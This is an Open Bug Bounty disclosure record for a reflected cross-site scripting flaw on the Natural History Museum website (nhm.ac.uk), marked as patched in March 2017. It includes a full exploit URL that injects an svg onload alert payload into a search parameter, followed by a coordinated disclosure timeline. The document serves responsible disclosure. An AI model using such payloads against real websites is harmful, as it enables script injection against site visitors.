nhm.ac.uk XSS vulnerability

2017-01-30T21:55:00
ID OBB:210176
Type openbugbounty
Reporter SonnySpooks
Modified 2017-03-01T18:34:00

Description

Vulnerable URL:
http://www.nhm.ac.uk/our-science/data/butmoth/search/GenusDetails.dsml?NUMBER=--%3E%3C/script%3E%3C/title%3E%22%3E%3Csvg/onload=alert(/XSSPOSED/)%3E&SUPERFAMIL;=NEPTICULOIDEA&AUTHORqtype;=equals&sort;=GENUS&SUBTRIBEqtype;=equals&YEARqtype;=equals&GENUSqtype;=equals&TRIBEqtype;=equals&SUBFAMILY;=Subfamily+unassigned&SUBFAMILYqtype;=equals&FAMILYqtype;=equals&beginIndex;=0&listPageURL;=GenusList3.dsml%3FSUPERFAMIL%3DNEPTICULOIDEA%26AUTHORqtype%3Dequals%26sort%3DGENUS%26SUBTRIBEqtype%3Dequals%26YEARqtype%3Dequals%26GENUSqtype%3Dequals%26TRIBEqtype%3Dequals%26SUBFAMILY%3DSubfamily%2Bunassigned%26SUBFAMILYqtype%3Dequals%26FAMILYqtype%3Dequals&searchPageURL;=index.dsml%3FSUPERFAMIL%3DNEPTICULOIDEA%26AUTHORqtype%3Dequals%26sort%3DGENUS%26SUBTRIBEqtype%3Dequals%26YEARqtype%3Dequals%26GENUSqtype%3Dequals%26TRIBEqtype%3Dequals%26SUBFAMILY%3DSubfamily%2Bunassigned%26SUBFAMILYqtype%3Dequals%26FAMILYqtype%3Dequals
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 56504
VIP website status:| No
Check nhm.ac.uk SSL connection:| (Grade: C+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 30 January, 2017 21:55 GMT
Generic security notifications sent to website owner| 30 January, 2017 21:57 GMT
Vulnerability details disclosed by researcher| 6 February, 2017 22:14 GMT
Vulnerability patched by the website owner| 1 March, 2017 18:34 GMT